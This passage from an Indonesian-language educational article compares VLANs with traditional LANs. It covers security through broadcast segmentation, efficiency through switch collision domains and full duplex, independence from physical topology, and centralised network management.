dengan VLAN adalah bahwa tiap-tiap workstation/user yang tergabung dalam
satu VLAN/bagian (organisasi, kelompok dsb) dapat tetap saling berhubungan
walaupun terpisah secara fisik. Atau lebih jelas lagi akan dapat kita
lihat perbedaan LAN dan VLAN pada gambar dibawah ini.

Gambar konfigurasi LAN

[hub]-[1]-[1]-[1] <– lan 1/di lantai 1 | [x]–[hub]-[2]-[2]-[2] <– lan 2/di lantai 2 | [hub]-[3]-[3]-[3] <– lan 3/di lantai 3 Gambar konfigurasi VLAN







Terlihat jelas VLAN telah merubah batasan fisik yang selama ini tidak dapatdiatasi oleh LAN. Keuntungan inilah yang diharapkan dapat memberikan
kemudahan-kemudahan baik secara teknis dan operasional.

PERBANDINGAN VLAN DAN LAN

A.Perbandingan Tingkat Keamanan

Penggunaan LAN telah memungkinkan semua komputer yang terhubung dalam jaringan
dapat bertukar data atau dengan kata lain berhubungan. Kerjasama ini semakin
berkembang dari hanya pertukaran data hingga penggunaan peralatan secara bersama
(resource sharing atau disebut juga hardware sharing).10 LAN memungkinkan data
tersebar secara broadcast keseluruh jaringan, hal ini akan mengakibatkan mudahnya
pengguna yang tidak dikenal (unauthorized user) untuk dapat mengakses semua
bagian dari broadcast. Semakin besar broadcast, maka semakin besar akses yang
didapat, kecuali hub yang dipakai diberi fungsi kontrol keamanan.

VLAN yang merupakan hasil konfigurasi switch menyebabkan setiap port switch
diterapkan menjadi milik suatu VLAN. Oleh karena berada dalam satu segmen,
port-port yang bernaung dibawah suatu VLAN dapat saling berkomunikasi langsung.
Sedangkan port-port yang berada di luar VLAN tersebut atau berada dalam
naungan VLAN lain, tidak dapat saling berkomunikasi langsung karena VLAN tidak
meneruskan broadcast.

VLAN yang memiliki kemampuan untuk memberikan keuntungan tambahan dalam
hal keamanan jaringan tidak menyediakan pembagian/penggunaan media/data
dalam suatu jaringan secara keseluruhan. Switch pada jaringan menciptakan
batas-batas yang hanya dapat digunakan oleh komputer yang termasuk dalam
VLAN tersebut. Hal ini mengakibatkan administrator dapat dengan mudah
mensegmentasi pengguna, terutama dalam hal penggunaan media/data yang
bersifat rahasia (sensitive information) kepada seluruh pengguna jaringan
yang tergabung secara fisik.

Keamanan yang diberikan oleh VLAN meskipun lebih baik dari LAN,belum menjamin
keamanan jaringan secara keseluruhan dan juga belum dapat dianggap cukup
untuk menanggulangi seluruh masalah keamanan .VLAN masih sangat memerlukan
berbagai tambahan untuk meningkatkan keamanan jaringan itu sendiri seperti
firewall, pembatasan pengguna secara akses perindividu, intrusion detection,
pengendalian jumlah dan besarnya broadcast domain, enkripsi jaringan, dsb.

Dukungan Tingkat keamanan yang lebih baik dari LAN inilah yang dapat
dijadikan suatu nilai tambah dari penggunaan VLAN sebagai sistem jaringan.
Salah satu kelebihan yang diberikan oleh penggunaan VLAN adalah kontrol
administrasi secara terpusat, artinya aplikasi dari manajemen VLAN dapat
dikonfigurasikan, diatur dan diawasi secara terpusat, pengendalian broadcast
jaringan, rencana perpindahan, penambahan, perubahan dan pengaturan akses
khusus ke dalam jaringan serta mendapatkan media/data yang memiliki fungsi
penting dalam perencanaan dan administrasi di dalam grup tersebut semuanya
dapat dilakukan secara terpusat. Dengan adanya pengontrolan manajemen
secara terpusat maka administrator jaringan juga dapat mengelompokkan
grup-grup VLAN secara spesifik berdasarkan pengguna dan port dari switch
yang digunakan, mengatur tingkat keamanan, mengambil dan menyebar data
melewati jalur yang ada, mengkonfigurasi komunikasi yang melewati switch,
dan memonitor lalu lintas data serta penggunaan bandwidth dari VLAN saat
melalui tempat-tempat yang rawan di dalam jaringan.

B.Perbandingan Tingkat Efisiensi

Untuk dapat mengetahui perbandingan tingkat efisiensinya maka perlu di
ketahui kelebihan yang diberikan oleh VLAN itu sendiri diantaranya:

•Meningkatkan Performa Jaringan
LAN yang menggunakan hub dan repeater untuk menghubungkan peralatan
komputer satu dengan lain yang bekerja dilapisan physical memiliki
kelemahan, peralatan ini hanya meneruskan sinyal tanpa memiliki
pengetahuan mengenai alamat-alamat yang dituju. Peralatan ini juga
hanya memiliki satu domain collision sehingga bila salah satu port
sibuk maka port-port yang lain harus menunggu. Walaupun peralatan
dihubungkan ke port-port yang berlainan dari hub.

Protokol ethernet atau IEEE 802.3 (biasa digunakan pada LAN) menggunakan
mekanisme yang disebut Carrier Sense Multiple Accsess Collision Detection
(CSMA/CD) yaitu suatu cara dimana peralatan memeriksa jaringan terlebih
dahulu apakah ada pengiriman data oleh pihak lain. Jika tidak ada
pengiriman data oleh pihak lain yang dideteksi, baru pengiriman data dilakukan.
Bila terdapat dua data yang dikirimkan dalam waktu bersamaan,
maka terjadilah tabrakan (collision) data pada jaringan. Oleh sebab itu
jaringan ethernet dipakai hanya untuk transmisi half duplex, yaitu pada
suatu saat hanya dapat mengirim atau menerima saja.

Berbeda dari hub yang digunakan pada jaringan ethernet (LAN), switch yang
bekerja pada lapisan datalink memiliki keunggulan dimana setiap port
didalam switch memiliki domain collision sendiri-sendiri. Oleh sebab
itu sebab itu switch sering disebut juga multiport bridge. Switch
mempunyai tabel penterjemah pusat yang memiliki daftar penterjemah untuk
semua port. Switch menciptakan jalur yang aman dari port pengirim dan
port penerima sehingga jika dua host sedang berkomunikasi lewat jalur
tersebut, mereka tidak mengganggu segmen lainnya. Jadi jika satu port
sibuk, port-port lainnya tetap dapat berfungsi.

Switch memungkinkan transmisi full-duplex untuk hubungan ke port dimana
pengiriman dan penerimaan dapat dilakukan bersamaan dengan penggunakan
jalur tersebut diatas. Persyaratan untuk dapat mengadakan hubungan
full-duplex adalah hanya satu komputer atau server saja yang dapat dihubungkan
ke satu port dari switch. Komputer tersebut harus memiliki network card
yang mampu mengadakan hubungan full-duflex, serta collision detection
dan loopback harus disable.

Switch pula yang memungkinkan terjadinya segmentasi pada jaringan atau
dengan kata lain switch-lah yang membentuk VLAN.Dengan adanya segmentasi
yang membatasi jalur broadcast akan mengakibatkan suatu VLAN tidak dapat
menerima dan mengirimkan jalur broadcast ke VLAN lainnya. Hal ini secara
nyata akan mengurangi penggunaan jalur broadcast secara keseluruhan,
mengurangi penggunaan bandwidth bagi pengguna, mengurangi kemungkinan
terjadinya broadcast storms (badai siaran) yang dapat menyebabkan
kemacetan total di jaringan komputer.

Administrator jaringan dapat dengan mudah mengontrol ukuran dari jalur
broadcast dengan cara mengurangi besarnya broadcast secara keseluruhan,
membatasi jumlah port switch yang digunakan dalam satu VLAN serta jumlah
pengguna yang tergabung dalam suatu VLAN.

•Terlepas dari Topologi Secara Fisik

Jika jumlah server dan workstation berjumlah banyak dan berada di lantai
dan gedung yang berlainan, serta dengan para personel yang juga tersebar
di berbagai tempat, maka akan lebih sulit bagi administrator jaringan
yang menggunakan sistem LAN untuk mengaturnya, dikarenakan akan banyak
sekali diperlukan peralatan untuk menghubungkannya. Belum lagi apabila
terjadi perubahan stuktur organisasi yang artinya akan terjadi banyak
perubahan letak personil akibat hal tersebut.

Permasalahan juga timbul dengan jaringan yang penggunanya tersebar di
berbagai tempat artinya tidak terletak dalam satu lokasi tertentu secara
fisik. LAN yang dapat didefinisikan sebagai network atau jaringan sejumlah
sistem komputer yang lokasinya terbatas secara fisik, misalnya dalam satu
gedung, satu komplek, dan bahkan ada yang menentukan LAN berdasarkan jaraknya
sangat sulit untuk dapat mengatasi masalah ini.

Sedangkan VLAN yang memberikan kebebasan terhadap batasan lokasi secara
fisik dengan mengijinkan workgroup yang terpisah lokasinya atau berlainan
gedung, atau tersebar untuk dapat terhubung secara logik ke jaringan
meskipun hanya satu pengguna. Jika infrastuktur secara fisik telah
terinstalasi, maka hal ini tidak menjadi masalah untuk menambah port
bagi VLAN yang baru jika organisasi atau departemen diperluas dan tiap
bagian dipindah. Hal ini memberikan kemudahan dalam hal pemindahan personel,
dan tidak terlalu sulit untuk memindahkan pralatan yang ada
serta konfigurasinya dari satu tempat ke tempat lain.Untuk para pengguna
yang terletak berlainan lokasi maka administrator jaringan hanya perlu
menkofigurasikannya saja dalam satu port yang tergabung dalam satu VLAN
yang dialokasikan untuk bagiannya sehingga pengguna tersebut dapat bekerja
dalam bidangnya tanpa memikirkan apakah ia harus dalam ruangan yang sama
dengan rekan-rekannya.

Hal ini juga mengurangi biaya yang dikeluarkan untuk membangun suatu
jaringan baru apabila terjadi restrukturisasi pada suatu perusahaan,
karena pada LAN semakin banyak terjadi perpindahan makin banyak pula
kebutuhan akan pengkabelan ulang, hampir keseluruhan perpindahan dan
perubahan membutuhkan konfigurasi ulang hub dan router.

VLAN memberikan mekanisme secara efektif untuk mengontrol perubahan ini
serta mengurangi banyak biaya untuk kebutuhan akan mengkonfigurasi ulang
hub dan router. Pengguna VLAN dapat tetap berbagi dalam satu network
address yang sama apabila ia tetap terhubung dalam satu swith port yang
sama meskipun tidak dalam satu lokasi. Permasalahan dalam hal perubahan
lokasi dapat diselesaikan dengan membuat komputer pengguna tergabung
kedalam port pada VLAN tersebut dan mengkonfigurasikan switch pada VLAN
tersebut.

•Mengembangkan Manajemen Jaringan

VLAN memberikan kemudahan, fleksibilitas, serta sedikitnya biaya yang
dikeluarkan untuk membangunnya. VLAN membuat jaringan yang besar lebih
mudah untuk diatur manajemennya karena VLAN mampu untuk melakukan
konfigurasi secara terpusat terhadap peralatan yang ada pada lokasi
yang terpisah. Dengan kemampuan VLAN untuk melakukan konfigurasi
secara terpusat, maka sangat menguntungkan bagi pengembangan manajemen
jaringan.

Dengan keunggulan yang diberikan oleh VLAN maka ada baiknya bagi
setiap pengguna LAN untuk mulai beralih ke VLAN. VLAN yang merupakan
pengembangan dari teknologi LAN ini tidak terlalu banyak melakukan
perubahan, tetapi telah dapat memberikan berbagai tambahan pelayanan
pada teknologi jaringan.